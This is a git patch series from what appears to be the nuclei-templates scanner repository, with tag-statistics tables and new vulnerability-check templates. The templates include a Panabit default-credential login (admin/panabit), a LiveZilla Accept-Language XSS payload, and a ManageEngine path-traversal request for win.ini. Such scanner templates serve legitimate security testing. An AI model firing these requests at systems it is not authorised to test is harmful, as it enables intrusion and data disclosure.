smartsheet | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| mozilla | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| rijksmuseum | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| dribbble | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| commvault | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| eyoumail | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| accuweather | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| weboftrust | 1 | | | | | | | | | +| mailboxvalidator | 1 | | | | | | | | | +| gofile | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| fleet | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| softaculous | 1 | | | | | | | | | +| cloudera | 1 | | | | | | | | | +| jwt | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| webalizer | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| spiderfoot | 1 | | | | | | | | | +| gateway | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| pinata | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| droneci | 1 | | | | | | | | | +| hetzner | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| jreport | 1 | | | | | | | | | +| guppy | 1 | | | | | | | | | +| identityguard | 1 | | | | | | | | | +| eibiz | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| malwarebazaar | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| idera | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| strava | 1 | | | | | | | | | +| virustotal | 1 | | | | | | | | | +| buddy | 1 | | | | | | | | | +| bigfix | 1 | | | | | | | | | +| clustering | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| xoops | 1 | | | | | | | | | +| rudloff | 1 | | | | | | | | | +| hrsale | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| version | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| php-fusion | 1 | | | | | | | | | +| oam | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| micro | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| zentral | 1 | | | | | | | | | +| particle | 1 | | | | | | | | | +| zuul | 1 | | | | | | | | | +| kingdee | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| alltube | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| slstudio | 1 | | | | | | | | | +| bible | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| phoronix | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| ixbusweb | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| cliniccases | 1 | | | | | | | | | +| appveyor | 1 | | | | | | | | | +| stackstorm | 1 | | | | | | | | | +| barracuda | 1 | | | | | | | | | +| struts2 | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| bravenewcoin | 1 | | | | | | | | | +| holidayapi | 1 | | | | | | | | | +| esxi | 1 | | | | | | | | | +| viaware | 1 | | | | | | | | | +| sls | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| webex | 1 | | | | | | | | | +| fcm | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| sponip | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| rwebserver | 1 | | | | | | | | | +| tarantella | 1 | | | | | | | | | +| xproxy | 1 | | | | | | | | | | jenzabar | 1 | | | | | | | | | +| open-redirect | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| gocron | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| dreamweaver | 1 | | | | | | | | | +| google-earth | 1 | | | | | | | | | +| istat | 1 | | | | | | | | | +| kyocera | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| purestorage | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| faust | 1 | | | | | | | | | +| cassandra | 1 | | | | | | | | | +| bonita | 1 | | | | | | | | | +| sourcecodester | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| jupyterhub | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| elementor | 1 | | | | | | | | | +| mx | 1 | | | | | | | | | +| intellect | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| etherscan | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| onkyo | 1 | | | | | | | | | +| idor | 1 | | | | | | | | | +| fms | 1 | | | | | | | | | +| gcp | 1 | | | | | | | | | +| caseaware | 1 | | | | | | | | | +| saml | 1 | | | | | | | | | +| siebel | 1 | | | | | | | | | +| livehelperchat | 1 | | | | | | | | | +| secnet | 1 | | | | | | | | | +| scanii | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| opencart | 1 | | | | | | | | | +| memory-pipes | 1 | | | | | | | | | +| mappress | 1 | | | | | | | | | +| twig | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| vision | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| seopanel | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| bitquery | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| teradici | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| web-dispatcher | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| ebird | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| bitcoinaverage | 1 | | | | | | | | | +| cucm | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| apcu | 1 | | | | | | | | | +| ruoyi | 1 | | | | | | | | | +| gsm | 1 | | | | | | | | | +| ncbi | 1 | | | | | | | | | +| kodexplorer | 1 | | | | | | | | | +| tianqing | 1 | | | | | | | | | +| micro-user-service | 1 | | | | | | | | | +| myanimelist | 1 | | | | | | | | | +| binance | 1 | | | | | | | | | +| hanwang | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| lionwiki | 1 | | | | | | | | | +| loytec | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| ninjaform | 1 | | | | | | | | | +| jabber | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| getgrav | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| directum | 1 | | | | | | | | | +| coinlayer | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| tekon | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| siemens | 1 | | | | | | | | | +| jeecg-boot | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| cx | 1 | | | | | | | | | +| mofi | 1 | | | | | | | | | +| blockfrost | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| noptin | 1 | | | | | | | | | +| superwebmailer | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| box | 1 | | | | | | | | | +| vms | 1 | | | | | | | | | +| cgit | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| hue | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| cve2001 | 1 | | | | | | | | | +| tufin | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| sitefinity | 1 | | | | | | | | | +| emerson | 1 | | | | | | | | | +| apple | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| stridercd | 1 | | | | | | | | | +| honeypot | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| pollbot | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| alquist | 1 | | | | | | | | | +| eventtickets | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| cooperhewitt | 1 | | | | | | | | | +| coinmarketcap | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| calendarific | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| mastodon | 1 | | | | | | | | | +| snipeit | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| domino | 1 | | | | | | | | | +| formcraft3 | 1 | | | | | | | | | +| eyesofnetwork | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| ucp | 1 | | | | | | | | | +| dwsync | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| pypicloud | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| cve2021wordpress | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| AlphaWeb | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| oki | 1 | | | | | | | | | +| aims | 1 | | | | | | | | | +| mspcontrol | 1 | | | | | | | | | +| ipvpn | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| kenesto | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| cve2004 | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| etherpad | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | | concourse | 1 | | | | | | | | | +| unisharp | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| gemweb | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| issabel | 1 | | | | | | | | | +| formalms | 1 | | | | | | | | | +| rsa | 1 | | | | | | | | | +| vercel | 1 | | | | | | | | | +| clearbit | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| biostar2 | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| hivemanager | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| yishaadmin | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| oliver | 1 | | | | | | | | | +| ssi | 1 | | | | | | | | | +| antsword | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| coinapi | 1 | | | | | | | | | +| admidio | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| books | 1 | | | | | | | | | +| gerapy | 1 | | | | | | | | | +| teltonika | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| icinga | 1 | | | | | | | | | +| totolink | 1 | | | | | | | | | +| sso | 1 | | | | | | | | | +| revslider | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| adminset | 1 | | | | | | | | | +| cofense | 1 | | | | | | | | | +| joget | 1 | | | | | | | | | +| activecollab | 1 | | | | | | | | | +| charity | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| zoomsounds | 1 | | | | | | | | | +| mirasys | 1 | | | | | | | | | +| wago | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| radius | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| gnuboard | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| netbeans | 1 | | | | | | | | | +| slocum | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| sunflower | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| overflow | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| caddy | 1 | | | | | | | | | +| bhagavadgita | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| urlscan | 1 | | | | | | | | | +| pieregister | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| dahua | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| hanming | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| cve2002 | 1 | | | | | | | | | +| bitrise | 1 | | | | | | | | | +| cname | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| piwigo | 1 | | | | | | | | | +| lumis | 1 | | | | | | | | | +| covalent | 1 | | | | | | | | | +| yopass | 1 | | | | | | | | | | openerp | 1 | | | | | | | | | +| f5 | 1 | | | | | | | | | +| nutanix | 1 | | | | | | | | | +| acemanager | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| zipkin | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 6501f7c113..063a2d959f 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1131 | daffainfo | 559 | cves | 1135 | info | 1165 | http | 3129 | -| panel | 505 | dhiyaneshdk | 415 | exposed-panels | 511 | high | 861 | file | 60 | -| lfi | 457 | pikpikcu | 315 | vulnerabilities | 444 | medium | 649 | network | 49 | -| xss | 356 | pdteam | 262 | technologies | 250 | critical | 405 | dns | 17 | -| wordpress | 349 | geeknik | 177 | exposures | 202 | low | 178 | | | -| exposure | 289 | dwisiswant0 | 165 | misconfiguration | 194 | unknown | 6 | | | -| rce | 285 | 0x_akoko | 127 | workflows | 186 | | | | | -| cve2021 | 278 | princechaddha | 127 | token-spray | 153 | | | | | -| tech | 264 | gy741 | 116 | default-logins | 93 | | | | | -| wp-plugin | 251 | pussycat0x | 107 | takeovers | 67 | | | | | +| cve | 1146 | daffainfo | 560 | cves | 1150 | info | 1183 | http | 3159 | +| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 868 | file | 68 | +| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 656 | network | 50 | +| xss | 361 | pdteam | 262 | technologies | 251 | critical | 410 | dns | 17 | +| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | | +| exposure | 292 | dwisiswant0 | 167 | misconfiguration | 196 | unknown | 6 | | | +| rce | 288 | princechaddha | 130 | workflows | 186 | | | | | +| cve2021 | 282 | 0x_akoko | 128 | token-spray | 153 | | | | | +| tech | 265 | gy741 | 117 | default-logins | 94 | | | | | +| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | | From d416b52b8eda78b226bc32a576ba64feb56154c3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 8 May 2022 12:59:15 +0000 Subject: [PATCH 061/115] Auto README Update [Sun May 8 12:59:15 UTC 2022] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index a25be66926..b841738b58 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1131 | daffainfo | 559 | cves | 1135 | info | 1165 | http | 3129 | -| panel | 505 | dhiyaneshdk | 415 | exposed-panels | 511 | high | 861 | file | 60 | -| lfi | 457 | pikpikcu | 315 | vulnerabilities | 444 | medium | 649 | network | 49 | -| xss | 356 | pdteam | 262 | technologies | 250 | critical | 405 | dns | 17 | -| wordpress | 349 | geeknik | 177 | exposures | 202 | low | 178 | | | -| exposure | 289 | dwisiswant0 | 165 | misconfiguration | 194 | unknown | 6 | | | -| rce | 285 | 0x_akoko | 127 | workflows | 186 | | | | | -| cve2021 | 278 | princechaddha | 127 | token-spray | 153 | | | | | -| tech | 264 | gy741 | 116 | default-logins | 93 | | | | | -| wp-plugin | 251 | pussycat0x | 107 | takeovers | 67 | | | | | +| cve | 1146 | daffainfo | 560 | cves | 1150 | info | 1183 | http | 3159 | +| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 868 | file | 68 | +| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 656 | network | 50 | +| xss | 361 | pdteam | 262 | technologies | 251 | critical | 410 | dns | 17 | +| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | | +| exposure | 292 | dwisiswant0 | 167 | misconfiguration | 196 | unknown | 6 | | | +| rce | 288 | princechaddha | 130 | workflows | 186 | | | | | +| cve2021 | 282 | 0x_akoko | 128 | token-spray | 153 | | | | | +| tech | 265 | gy741 | 117 | default-logins | 94 | | | | | +| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | | -**254 directories, 3476 files**. +**260 directories, 3515 files**. From bed15d04eba2ed61d036c4b3066640678e90b24f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 8 May 2022 19:24:15 +0530 Subject: [PATCH 062/115] Update panabit-default-login.yaml --- .../panabit/panabit-default-login.yaml | 21 ++++++++++++------- 1 file changed, 14 insertions(+), 7 deletions(-) diff --git a/default-logins/panabit/panabit-default-login.yaml b/default-logins/panabit/panabit-default-login.yaml index d614c6d2fe..08b8454c1e 100644 --- a/default-logins/panabit/panabit-default-login.yaml +++ b/default-logins/panabit/panabit-default-login.yaml @@ -2,12 +2,13 @@ id: panabit-default-login info: name: Panabit Gateway Default Login - author: pikpikcu + author: pikpikcu,ritikchaddha severity: high description: Panabit Gateway default credentials were discovered. reference: - https://max.book118.com/html/2017/0623/117514590.shtm - https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf + - https://topic.alibabacloud.com/a/panabit-monitoring-installation-tutorial_8_8_20054193.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 @@ -26,20 +27,20 @@ requests: Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{username}}" + Content-Disposition: form-data; name="username" - admin + {{username}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{password}}" + Content-Disposition: form-data; name="password" - panabit + {{password}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC-- payloads: username: - - username + - admin password: - - password + - panabit attack: pitchfork matchers-condition: and @@ -50,6 +51,12 @@ requests: - 'urn:schemas-microsoft-com:vml' part: body condition: and + + - type: word + part: header + words: + - "paonline_admin" + condition: and - type: status status: From 2d4a9f0fde7daa361b56244e10c6c5e28299487d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 8 May 2022 19:31:15 +0530 Subject: [PATCH 063/115] Update panabit-default-login.yaml --- default-logins/panabit/panabit-default-login.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/default-logins/panabit/panabit-default-login.yaml b/default-logins/panabit/panabit-default-login.yaml index 08b8454c1e..32e1bf79f9 100644 --- a/default-logins/panabit/panabit-default-login.yaml +++ b/default-logins/panabit/panabit-default-login.yaml @@ -13,6 +13,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 + metadata: + fofa-query: app="Panabit-智能网关" tags: panabit,default-login requests: @@ -51,12 +53,12 @@ requests: - 'urn:schemas-microsoft-com:vml' part: body condition: and - + - type: word part: header words: - "paonline_admin" - condition: and + condition: and - type: status status: From deb3d6c26552da13a589054f6542016b76269e01 Mon Sep 17 00:00:00 2001 From: Mohsen khashei Date: Sun, 8 May 2022 19:15:08 +0430 Subject: [PATCH 064/115] Create CVE-2019-12962.yaml --- cves/2019/CVE-2019-12962.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2019/CVE-2019-12962.yaml diff --git a/cves/2019/CVE-2019-12962.yaml b/cves/2019/CVE-2019-12962.yaml new file mode 100644 index 0000000000..b409a5dcc7 --- /dev/null +++ b/cves/2019/CVE-2019-12962.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-12962 + +info: + name: LiveZilla Server 8.0.1.0 XSS + author: Clment Cruchet + severity: medium + description: LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS + reference: https://www.exploit-db.com/exploits/49669 + tags: cve,cve2019,livezilla,xss + +requests: + - method: GET + headers: + Accept-Language: ';alert(document.domain)// + path: + - '{{BaseURL}}/mobile/index.php' + matchers-condition: and + matchers: + + - type: word + words: + - "alert(document.domain)//" + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 \ No newline at end of file From a7a30a3ddcfa878e6bef7a71c50ad652619d6ce1 Mon Sep 17 00:00:00 2001 From: Mohsen khashei Date: Sun, 8 May 2022 19:22:43 +0430 Subject: [PATCH 065/115] Create CVE-2019-12962.yaml --- cves/2019/CVE-2019-12962.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-12962.yaml b/cves/2019/CVE-2019-12962.yaml index b409a5dcc7..7146e09c23 100644 --- a/cves/2019/CVE-2019-12962.yaml +++ b/cves/2019/CVE-2019-12962.yaml @@ -29,4 +29,5 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + \ No newline at end of file From 54f2824775aed8f99fe1585f52d09e0134643b59 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 9 May 2022 10:59:40 +0900 Subject: [PATCH 066/115] Create CVE-2017-11512.yaml --- CVE-2017-11512.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 CVE-2017-11512.yaml diff --git a/CVE-2017-11512.yaml b/CVE-2017-11512.yaml new file mode 100644 index 0000000000..c965cf3118 --- /dev/null +++ b/CVE-2017-11512.yaml @@ -0,0 +1,32 @@ +id: CVE-2017-11512 + +info: + name: ManageEngine ServiceDesk - Unauthenticated Arbitrary File Download + author: 0x_Akoko + severity: high + description: The ManageEngine ServiceDesk 9.3.9328 is vulnerable to arbitrary file downloads due to improper restrictions of the pathname used in the name parameter for the download-snapshot URL. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. + reference: + - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html + - https://www.cvedetails.com/cve/CVE-2017-11512 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-11512 + cwe-id: CWE-22 + tags: cve,cve2017,manageengine,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini' + - '{{BaseURL}}/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and From 4798c1a14c215bf19902e0df88bf166028865c90 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 9 May 2022 12:41:38 +0530 Subject: [PATCH 067/115] Update CVE-2019-12962.yaml --- cves/2019/CVE-2019-12962.yaml | 25 +++++++++++++++---------- 1 file changed, 15 insertions(+), 10 deletions(-) diff --git a/cves/2019/CVE-2019-12962.yaml b/cves/2019/CVE-2019-12962.yaml index 7146e09c23..9a2929fdc3 100644 --- a/cves/2019/CVE-2019-12962.yaml +++ b/cves/2019/CVE-2019-12962.yaml @@ -1,33 +1,38 @@ id: CVE-2019-12962 info: - name: LiveZilla Server 8.0.1.0 XSS + name: LiveZilla Server 8.0.1.0 - Cross Site Scripting author: Clment Cruchet severity: medium - description: LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS - reference: https://www.exploit-db.com/exploits/49669 + description: | + LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS + reference: + - https://www.exploit-db.com/exploits/49669 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 + metadata: + verified-by: dhiyaneshdk + shodan-query: http.html:LiveZilla tags: cve,cve2019,livezilla,xss requests: - method: GET - headers: - Accept-Language: ';alert(document.domain)// path: - '{{BaseURL}}/mobile/index.php' + + headers: + Accept-Language: ';alert(document.domain)//' matchers-condition: and matchers: - - type: word - words: - - "alert(document.domain)//" part: body + words: + - "var detectedLanguage = ';alert(document.domain)//';" - type: word + part: header words: - "text/html" - part: header - type: status status: - 200 - \ No newline at end of file From 489fcfe8557cad35ffa97023060de8901bcb70a4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 9 May 2022 12:46:35 +0530 Subject: [PATCH 068/115] Update and rename CVE-2017-11512.yaml to cves/2017/CVE-2017-11512.yaml --- CVE-2017-11512.yaml => cves/2017/CVE-2017-11512.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) rename CVE-2017-11512.yaml => cves/2017/CVE-2017-11512.yaml (66%) diff --git a/CVE-2017-11512.yaml b/cves/2017/CVE-2017-11512.yaml similarity index 66% rename from CVE-2017-11512.yaml rename to cves/2017/CVE-2017-11512.yaml index c965cf3118..62b48662da 100644 --- a/CVE-2017-11512.yaml +++ b/cves/2017/CVE-2017-11512.yaml @@ -4,7 +4,8 @@ info: name: ManageEngine ServiceDesk - Unauthenticated Arbitrary File Download author: 0x_Akoko severity: high - description: The ManageEngine ServiceDesk 9.3.9328 is vulnerable to arbitrary file downloads due to improper restrictions of the pathname used in the name parameter for the download-snapshot URL. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. + description: | + The ManageEngine ServiceDesk 9.3.9328 is vulnerable to arbitrary file downloads due to improper restrictions of the pathname used in the name parameter for the download-snapshot URL. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. reference: - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html - https://www.cvedetails.com/cve/CVE-2017-11512 @@ -13,7 +14,10 @@ info: cvss-score: 7.5 cve-id: CVE-2017-11512 cwe-id: CWE-22 - tags: cve,cve2017,manageengine,lfi + metadata: + verified-by: princechaddha + shodan-query: http.title:"ManageEngine" + tags: cve,cve2017,manageengine,lfr,unauth requests: - method: GET From 5b160fe498634eca24d5c250983b167913f09395 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 9 May 2022 07:17:20 +0000 Subject: [PATCH 069/115] Auto Generated CVE annotations [Mon May 9 07:17:20 UTC 2022] :robot: --- cves/2019/CVE-2019-12962.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2019/CVE-2019-12962.yaml b/cves/2019/CVE-2019-12962.yaml index 9a2929fdc3..e5a733f55c 100644 --- a/cves/2019/CVE-2019-12962.yaml +++ b/cves/2019/CVE-2019-12962.yaml @@ -13,6 +13,11 @@ info: verified-by: dhiyaneshdk shodan-query: http.html:LiveZilla tags: cve,cve2019,livezilla,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-12962 + cwe-id: CWE-79 requests: - method: GET From 72c7e4063648a27bdd67de5f775069aa7373b98f Mon Sep 17 00:00:00 2001 